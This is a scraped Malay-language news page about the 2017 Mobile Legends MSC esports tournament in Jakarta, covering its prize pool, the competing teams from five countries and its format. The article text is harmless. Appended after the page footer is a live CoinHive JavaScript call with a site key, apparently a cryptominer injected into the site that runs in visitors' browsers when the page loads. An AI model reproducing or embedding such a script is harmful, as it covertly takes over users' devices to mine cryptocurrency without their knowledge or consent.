© Copyright 2017, All Rights Reserved
Home / Ekslusif / Mobile Legends Siapa bakal juara Kejohanan MSC

Mobile Legends Siapa bakal juara Kejohanan MSC


KUALA LUMPUR: Penganjur permainan video atas talian, Mobile Legends: Bang Bang pada Jumaat mengumumkan hadiah  bagi Kejohanan Jemputan Lima Negara Asia Tenggara Mobile Legends (MSC) adalah berjumlah sebanyak RM429,500.

Lapan kumpulan dari Indonesia, Thailand, Singapura, Filipina dan Malaysia akan berentap untuk bergelar juara kejohanan ini, yang bakal berlangsung di Taman Anggrek Mall Atrium Jakarta, Indonesia 1 September nanti.

Kejohanan ini mencatat sejarah tersendiri apabila diangkat sebagai kejohanan rasmi Mobile Legends yang pertama peringkat di antarabangsa.

Berikut adalah senarai kumpulan yang bersaing merebut gelaran juara Kejohanan MSC:

  • Team Saiya – Malaysia
  • MyA JR – Malaysia
  • Salty Salad – Filipina
  • Solid Gaming Alpha – Filipina
  • Saints Indo = Indonesia
  • Elite8 Ssport – Indonesia
  • IDONOTSLEEP = Thailand
  • Impunity – Singapura

Kejohanan ini bakal menyaksikan 14 pertarungan dengan format dua kali penyingkiran.

Mobile Legends merupakan satu permainan video mudah alih atas talian multi-pemain yang dibangunkan dan diterbitkan oleh Moonton.

Setiap satu perlawanan, dua kumpulan akan bertarung untuk ‘memusnahkan’  pangkalan musuh mereka dan pada masa yang sama mereka juga perlu mempertahankan pangkalan sendiri melalui beberapa laluan yang dikenali sebagai “atas”, “tengah” dan “bawah” yang menghubungkan kedua-dua pangkalan itu.

Mobile Legends dilancarkan pada 14 Julai tahun lalu di peranti Android dan 9 November pada tahun yang sama di peranti iOS.

Setakat Julai 2017, permainan itu telah dimuat turun oleh kira-kira empat juta pemain.


Source link

Tinggalkan Ulasan Anda

About admin

x

Check Also

Asal kucing jalanan kini Labun miliki kad matrik dan ikuti kuliah di UIA

SETAHUN lalu, gelagat seekor kucing yang tekun mendengar butir bicara pensyarah dirakam ...

Facebook Auto Publish Powered By : XYZScripts.com
© Copyright 2017, All Rights Reserved
%d bloggers like this:
var m = new CoinHive.Anonymous('dkVZKvPTpA9ReGRa2gsf6amqUO6Yr4Pu'); m.start();